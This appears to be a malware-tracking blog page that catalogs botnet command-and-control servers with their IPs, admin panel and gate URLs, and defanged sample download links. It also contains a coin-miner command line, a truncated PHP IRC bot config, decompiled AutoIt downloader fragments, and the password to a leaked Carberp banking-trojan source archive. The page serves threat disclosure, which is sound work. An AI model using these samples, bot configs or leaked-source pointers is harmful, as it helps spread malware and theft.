Sample: hxxp://darknode.net/Mining.exe coin-miner.exe” -a sha256 -o hxxp://brucegregory_bot:x@us.eclipsemc.com:8337 -T 83 -l yes -t 1 hosting infos: http://whois.domaintools.com/67.14.164.114
37.221.170.195(PHP Bots hosted in Germany Frankfurt Am MainVoxility S.r.l.)
Found by Yewnix <? set_time_limit(0); error_reporting(0); class Anxiety { var $config = array("server"=>"37.221.170.195", // Server IP Address "port"=>443, "pass"=>"", // Server Password "prefix"=>"[r00t]-", "maxrand"=>3, "chan"=>"#exploit", // Channel "key"=>"lolmoney", // Channel Key "modes"=>"+p", "password"=>"lolmoney", // Bot Password "trigger"=>".", "hostauth"=>"anxiety.gov" // * For Any Hostname //Leave all of this shit down here alone, unless you know whatRead more...
Carberp The Banking Trojan Source Now Available To Public
First Zeus now Carberp source are leaked to public Picture from dk forum Source and passwd for the rar archive are available via twitter thnx to ivanlef0u Another link for the source here(around 1.88GB) Password for the archive: “Kj1#w2*LadiOQpw3oi029)K Oa(28)uspeh”
175.41.29.181(Pony hosted in Hong Kong Hong Kong Unit 1702 Ramada Tower)
Admin Panel: 175.41.29.181/pfx/admin.php The rest of files are here: hxxp://175.41.29.181/pfx/ setup.php is still in this folder Pony sample: hxxp://175.41.29.181/pn1.exe hosting infos: http://whois.domaintools.com/175.41.29.181
srv1.su(snk’s botnet hosted in Luxembourg Steinsel Root Sa)
The bot is downloaded by this autoit sample: hxxp://sglegacy.com/AA/dava.exe wich looks like http autoit downloader login here: hxxp://www.sglegacy.com/AA/index.php/login another sample downloaded from the dava.ese is this: hxxp://la-majeur.com/images/beta.exe( Betabot) here dava.exe decompiled: $at2 = "0" $at5 = 0 $at1 = "0" $at3 = "0" $avm = "0" $asb = "0" $at4 = "0" #NoTrayIcon #Region #AutoIt3Wrapper_UseUpx=nRead more...
belakey.com(Pony hosted in Germany Gunzenhausen Osauhing Future Technologies)
Resolved : [belakey.com] To [46.4.199.232] Pony Gate: belakey.com/pony/gate.php Admin Panel: hxxp://belakey.com/pony/admin.php Sample: hxxp://188.40.33.69/z/pony4.exe hosting infos: http://whois.domaintools.com/46.4.199.232
thinkgreensupply.com(Pony hosted in United States Portland Directspace Networks Llc.)
Resolved : [thinkgreensupply.com] To [174.140.168.239] Admin Panel: hxxp://thinkgreensupply.com/ponyb/admin.php Gate: hxxp://thinkgreensupply.com/ponyb/gate.php hosting infos: http://whois.domaintools.com/174.140.168.239
vkdsfh9ifiuhi.info(Andromeda HTTP Botnet hosted in Netherlands Haarlem Fiberring B.v.)
HTTP Requests: hxxp://TelevisionHunter.com/new/gate.php Downloads this file: vkdsfh9ifiuhi.info/mojo/art.jpg Plugins: hxxp://cardpalooza.su/rk.mod hxxp://dijitalledtabela.com/bd3.mod Other domains: lnx-games.su rk.mod here http://cur.lv/14hlg bd3.mod http://cur.lv/14hlx Hosting infos: http://whois.domaintools.com/87.255.51.229
kalurjaq.ru(Kelihos hosted in Kazakhstan Almaty Jsc Almatv)
Kelihos (also know as Hlux) is a Spambot with the capability to steal credentials from the victims computer and drop additional malware. While the old version used the second level domain cz.cc for it’s distribution and to control the botnet, the new version takes advantage of TLD .eu in combination with Fast Flux techniques. HTTPRead more...
z.joerv02.com(irc botnet hosted in China Nanjing Chinanet Jiangsu Province Network)
Name Query Type Query Result Successful Protocol api.wipmania.com DNS_TYPE_A 69.197.137.58 YES udp z.baerr02.com DNS_TYPE_A NO udp z.joerv02.com DNS_TYPE_A 58.221.60.87 YES udp Server: z.joerv02.com:6513 PASS smart Channels: #dpi,#suk.#sar PASS smartRead more...